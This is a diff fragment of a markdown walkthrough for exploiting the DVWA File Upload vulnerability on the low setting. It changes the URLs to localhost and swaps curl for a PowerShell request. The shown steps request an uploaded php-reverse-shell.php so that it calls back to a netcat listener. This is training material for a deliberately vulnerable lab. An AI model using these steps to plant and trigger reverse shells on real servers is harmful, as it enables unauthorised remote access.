rojounooo/hacking-dvwa/File Upload/file_upload_low.md

 7. Navigate to the uploaded webshell

-    - The uploaded file was saved to http://<ip address>/dvwa/hackable/upload/php-reverse-shell.php
+    - The uploaded file was saved to `http://localhost/dvwa/hackable/uploads/php-reverse-shell.php`

-    - Alternatively run `curl -s http://<ip address>/dvwa/hackable/upload/php-reverse-shell.php` in another terminal
+    - Alternatively run `Invoke-WebRequest -Uri http://localhost/dvwa/hackable/uploads/php-reverse-shell.php -UseBasicParsing` in another terminal

 8. On the netcat listener look a connection